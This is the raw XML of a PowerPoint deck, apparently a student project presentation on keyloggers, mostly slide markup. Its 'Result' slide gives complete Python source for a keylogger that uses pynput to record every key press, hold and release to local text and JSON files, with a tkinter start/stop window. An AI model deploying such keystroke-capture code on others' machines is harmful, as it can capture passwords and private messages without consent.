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72" r:id="rId1"/>
  </p:sldMasterIdLst>
  <p:notesMasterIdLst>
    <p:notesMasterId r:id="rId2"/>
  </p:notesMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="281" r:id="rId3"/>
    <p:sldId id="282" r:id="rId4"/>
    <p:sldId id="283" r:id="rId5"/>
    <p:sldId id="284" r:id="rId6"/>
    <p:sldId id="285" r:id="rId7"/>
    <p:sldId id="286" r:id="rId8"/>
    <p:sldId id="287" r:id="rId9"/>
    <p:sldId id="288" r:id="rId10"/>
    <p:sldId id="289" r:id="rId11"/>
    <p:sldId id="290" r:id="rId12"/>
    <p:sldId id="291"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0"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3" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048605" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="581193" y="729658"/>
            <a:ext cx="11029616" cy="492855"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048606"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7"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8"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09" name="Footer Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="581192" y="6423914"/>
            <a:ext cx="6917210" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="rect"/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="104861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altLang="en-US" b="1" lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>K</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y</a:t>
            </a:r>
            <a:r>
              <a:rPr altLang="en-US" b="1" lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>l</a:t>
            </a:r>
            <a:r>
              <a:rPr altLang="en-US" b="1" lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>o</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a</a:t>
            </a:r>
            <a:r>
              <a:rPr altLang="en-US" b="1" lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>n</a:t>
            </a:r>
            <a:r>
              <a:rPr altLang="en-US" b="1" lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>d</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c</a:t>
            </a:r>
            <a:r>
              <a:rPr altLang="en-US" b="1" lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>u</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i</a:t>
            </a:r>
            <a:r>
              <a:rPr altLang="en-US" b="1" lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>t</a:t>
            </a:r>
            <a:r>
              <a:rPr altLang="en-US" b="1" lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>y</a:t>
            </a:r>
            <a:endParaRPr altLang="en-US" lang="zh-CN"/>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1. </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T</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" sz="2000" lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>H</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" sz="2000" lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Y</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K</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R</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NG</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L</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" sz="2000" lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>L</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
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:solidFill>
            <a:srgbClr val="02A5E3"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
            <a:prstDash val="solid"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>R</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>u</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>l</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>t</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048612" name=""/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="295836" y="1601516"/>
            <a:ext cx="5194767" cy="4469572"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN"/>
              <a:t>import tkinter as tk</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN"/>
              <a:t>from tkinter import *</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN"/>
              <a:t>from pynput import keyboard</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN"/>
              <a:t>import json</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN"/>
              <a:t>keys_used = []</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN"/>
              <a:t>flag = False</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN"/>
              <a:t>keys = ""</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN"/>
              <a:t>def generate_text_log(key):</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN"/>
              <a:t>    with open('key_log.txt', "w+") as keys:</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN"/>
              <a:t>        keys.write(key)</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN"/>
              <a:t>def generate_json_file(keys_used):</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN"/>
              <a:t>    with open('key_log.json', '+wb') as key_log:</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN"/>
              <a:t>        key_list_bytes = json.dumps(keys_used).encode()</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN"/>
              <a:t>        key_log.write(key_list_bytes)</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN"/>
              <a:t>def on_press(key):</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN"/>
              <a:t>    global flag, keys_used, keys</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN"/>
              <a:t>    if flag == False:</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN"/>
              <a:t>        keys_used.append(</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN"/>
              <a:t>            {'Pressed': f'{key}'}</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN"/>
              <a:t>        )</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN"/>
              <a:t>        flag = True</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN"/>
              <a:t>    if flag == True:</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN"/>
              <a:t>        keys_used.append(</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN"/>
              <a:t>            {'Held': f'{key}'}</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN"/>
              <a:t>        )</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN"/>
              <a:t>    generate_json_file(keys_used)</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN"/>
              <a:t>def on_release(key):</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN"/>
              <a:t>    global flag, keys_used, keys</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN"/>
              <a:t>    keys_used.append(</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN"/>
              <a:t>        {'Released': f'{key}'}</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN"/>
              <a:t>    )</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN"/>
              <a:t>    if flag == True:</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN"/>
              <a:t>        flag = False</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN"/>
              <a:t>    generate_json_file(keys_used)</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN"/>
              <a:t>    keys = keys + str(key)</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN"/>
              <a:t>    generate_text_log(str(keys))</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN"/>
              <a:t>def start_keylogger():</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN"/>
              <a:t>    global listener</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN"/>
              <a:t>    listener = keyboard.Listener(on_press=on_press, on_release=on_release)</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN"/>
              <a:t>    listener.start()</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN"/>
              <a:t>    label.config(text="[+] Keylogger is running!\n[!] Saving the keys in 'keylogger.txt'")</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN"/>
              <a:t>    start_button.config(state='disabled')</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN"/>
              <a:t>    stop_button.config(state='normal')</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN"/>
              <a:t>def stop_keylogger():</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN"/>
              <a:t>    global listener</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN"/>
              <a:t>    listener.stop()</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN"/>
              <a:t>    label.config(text="Keylogger stopped.")</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN"/>
              <a:t>    start_button.config(state='normal')</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN"/>
              <a:t>    stop_button.config(state='disabled')</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN"/>
              <a:t>root = Tk()</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN"/>
              <a:t>root.title("Keylogger")</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN"/>
              <a:t>label = Label(root, text='Click "Start" to begin keylogging.')</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN"/>
              <a:t>label.config(anchor=CENTER)</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN"/>
              <a:t>label.pack()</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN"/>
              <a:t>start_button = Button(root, text="Start", command=start_keylogger)</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN"/>
              <a:t>start_button.pack(side=LEFT)</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN"/>
              <a:t>stop_button = Button(root, text="Stop", command=stop_keylogger, state='disabled')</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN"/>
              <a:t>stop_button.pack(side=RIGHT)</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN"/>
              <a:t>root.geometry("250x250")</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN"/>
              <a:t>root.mainloop()</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2021-05-25T18:50:10Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-04-08T14:36:39Z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8d3f03368a63494e864f721a4166f3c1</vt:lpwstr>
  </property>
</Properties>
</file>